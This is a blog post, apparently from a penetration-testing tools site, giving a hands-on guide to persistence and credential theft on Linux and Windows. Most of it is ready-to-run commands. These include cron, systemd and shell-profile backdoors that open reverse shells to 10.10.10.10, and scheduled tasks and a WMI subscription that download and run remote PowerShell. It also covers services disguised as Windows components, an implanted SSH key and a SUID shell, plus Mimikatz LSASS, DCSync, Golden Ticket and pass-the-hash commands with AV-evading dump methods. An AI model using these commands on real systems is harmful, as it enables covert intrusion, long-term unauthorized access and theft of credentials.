Back to blog
Persistence Mechanisms: Backdoors, Scheduled Tasks, and LSASS Credential Dumping
October 10, 202516 min read
PersistenceCredential DumpingMimikatzRed TeamActive Directory
Persistence is the phase where you ensure your access survives reboots, logoffs, and incident response activities. As a penetration tester, demonstrating persistence capability proves the risk of an attacker maintaining long-term access — a critical finding for any engagement report. This guide covers realistic persistence techniques and the credential dumping that often enables lateral movement.
Linux Persistence Techniques
| Technique | OS | Tool/Method | Detection Risk | MITRE ATT&CK |
|---|---|---|---|---|
| Cron job | Linux | crontab -e, /etc/cron.d/ | Medium | T1053.003 |
| Startup script | Linux | ~/.bashrc, /etc/profile.d/ | Low | T1546.004 |
| Systemd service | Linux | /etc/systemd/system/ | Medium | T1543.002 |
| Registry run key | Windows | HKCUSoftwareMicrosoftWindowsCurrentVersionRun | Medium | T1547.001 |
| Scheduled task | Windows | schtasks /create | Medium | T1053.005 |
| WMI subscription | Windows | WMI event subscription | Low | T1546.003 |
| DLL hijacking | Windows | Replace DLL in app dir | Low | T1574.001 |
| SSH authorized_keys | Linux | ~/.ssh/authorized_keys | Low | T1098.004 |
| SUID backdoor | Linux | chmod +s /bin/bash | High | T1548.001 |
| Web shell | Both | PHP/ASPX/JSP in web root | High | T1505.003 |
flowchart LR
Persistence["Persistence Types"] --> UserLevel["User-Level
(survives relogin)"]
Persistence --> SystemLevel["System-Level
(survives reboot)"]
Persistence --> Stealthy["Stealthy
(evades basic detection)"]
UserLevel --> CronUser["User crontab
~/.bashrc/.profile"]
UserLevel --> SSHKey["SSH authorized_keys"]
SystemLevel --> CronRoot["Root cron
Systemd service
Scheduled task"]
SystemLevel --> RegistryRun["Registry run key
Startup folder"]
Stealthy --> WMISub["WMI subscription"]
Stealthy --> DLLHijack["DLL hijacking"]
Stealthy --> Rootkit["Kernel rootkit module"]
Crontab Backdoor
# Add a cron job for the current user (survives as long as user exists)
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'") | crontab -
# System-wide cron (requires root)
echo '* * * * * root bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"' >> /etc/crontab
# More stealthy — use a script file so crontab entry looks legitimate
echo '#!/bin/bash' > /tmp/.sysupdate
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' >> /tmp/.sysupdate
chmod +x /tmp/.sysupdate
(crontab -l 2>/dev/null; echo "@reboot /tmp/.sysupdate") | crontab -Systemd Service
# Create a persistent backdoor service (requires root)
cat > /etc/systemd/system/sysmon.service << 'EOF'
[Unit]
Description=System Monitor Service
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable sysmon
systemctl start sysmonShell Profile Backdoor
# Execute on every bash login (noisy but simple)
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &' >> ~/.bashrc
# More stealthy — only trigger if specific condition is met
echo 'if [ $(id -u) -eq 0 ]; then nohup bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" &>/dev/null & fi' >> /etc/profileSSH Authorized Keys
# Best persistence on Linux — stable, interactive, no callbacks
mkdir -p /root/.ssh
echo "ssh-ed25519 AAAA...attacker_pubkey..." >> /root/.ssh/authorized_keys
chmod 700 /root/.ssh && chmod 600 /root/.ssh/authorized_keysSUID Backdoor
# Create a copy of bash with SUID bit set
cp /bin/bash /tmp/.hidden_bash
chmod +s /tmp/.hidden_bash
# Later, escalate from any user:
/tmp/.hidden_bash -p # -p preserves EUID (root)Windows Persistence Techniques
Registry Run Keys
:: Per-user persistence (runs on login for current user)
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /t REG_SZ /d "C:\Users
ictim\AppData\Roaming\update.exe" /f
:: System-wide (requires admin, runs for all users)
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "SecurityService" /t REG_SZ /d "C:\Windows\System32\svchost_backdoor.exe" /f
:: RunOnce (one-time execution, then deleted)
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v "Setup" /t REG_SZ /d "C:\evil\setup.exe" /fScheduled Task
:: Create a scheduled task running as SYSTEM
schtasks /create /tn "WindowsDefenderUpdate" /tr "C:\evilackdoor.exe" /sc ONLOGON /ru SYSTEM /f
:: Repeating task every 5 minutes
schtasks /create /tn "HealthCheck" /tr "powershell -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/ps.ps1')" /sc MINUTE /mo 5 /ru SYSTEM /fMalicious Service
:: Create a new service pointing to your backdoor
sc create "WinDefSvc" binpath= "C:\evilackdoor.exe" start= auto displayname= "Windows Defender Service"
sc start WinDefSvcWMI Subscriptions (Fileless)
# WMI event subscriptions survive reboots and leave minimal traces
# Run this PowerShell as admin:
$EventFilter = ([wmiclass]"\root\subscription:__EventFilter").CreateInstance()
$EventFilter.QueryLanguage = "WQL"
$EventFilter.Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfRawData_PerfOS_System'"
$EventFilter.Name = "SystemFilter"
$EventFilter.Put()
$Consumer = ([wmiclass]"\root\subscription:CommandLineEventConsumer").CreateInstance()
$Consumer.Name = "SystemConsumer"
$Consumer.CommandLineTemplate = "powershell.exe -ep bypass -c `"IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/ps.ps1')`""
$Consumer.Put()
$Binding = ([wmiclass]"\root\subscription:__FilterToConsumerBinding").CreateInstance()
$Binding.Filter = $EventFilter.__Path
$Binding.Consumer = $Consumer.__Path
$Binding.Put()Credential Dumping with Mimikatz
Mimikatz remains the gold standard for Windows credential extraction. It requires admin/SYSTEM privileges:
:: Dump credentials from LSASS memory (cleartext passwords if WDigest enabled)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
:: Dump NTLM hashes from SAM (local accounts)
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
:: DCSync attack — dump all domain hashes without touching LSASS
:: Requires Domain Replication privileges (DA or equivalent)
mimikatz.exe "lsadump::dcsync /domain:corp.local /all /csv" "exit"
:: Golden Ticket creation
mimikatz.exe "kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:aad3b435... /id:500" "exit"
:: Pass-the-Hash (lateral movement)
mimikatz.exe "sekurlsa::pth /user:admin /domain:corp.local /ntlm:aad3b435... /run:cmd.exe"LSASS Dump Without Mimikatz
Dropping mimikatz.exe on disk triggers AV. Instead, dump LSASS memory and process it offline:
:: Method 1: procdump (Microsoft-signed, often AV-whitelisted)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
:: Method 2: comsvcs.dll (built-in Windows DLL, very stealthy)
:: Get LSASS PID first
tasklist | findstr lsass
:: Then dump (run as SYSTEM or admin)
rundll32.exe C:\windows\System32\comsvcs.dll MiniDump 820 C:\lsass.dmp full
:: Method 3: Task Manager (GUI) — right-click lsass.exe > Create dump file
:: Saves to C:\Users\[user]\AppData\Local\Temp\lsass.DMP
:: Process the dump offline with mimikatz (on attacker machine):
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"The Active Directory Generator generates DCSync, Golden Ticket, and Kerberoasting commands tailored to your domain. After dumping hashes, use the Hash Cracking Tool to identify and crack NTLM hashes.
Cleaning Up Artifacts
A professional pentest includes verifying that your test artifacts are removed:
# Linux cleanup
crontab -r # Remove all crontab entries
systemctl disable sysmon # Disable service
rm /etc/systemd/system/sysmon.service
sed -i '/10.10.10.10/d' ~/.bashrc # Remove profile backdoor
rm /tmp/.hidden_bash /tmp/.sysupdate
# Windows cleanup
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /f
schtasks /delete /tn "WindowsDefenderUpdate" /f
sc stop WinDefSvc && sc delete WinDefSvcLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides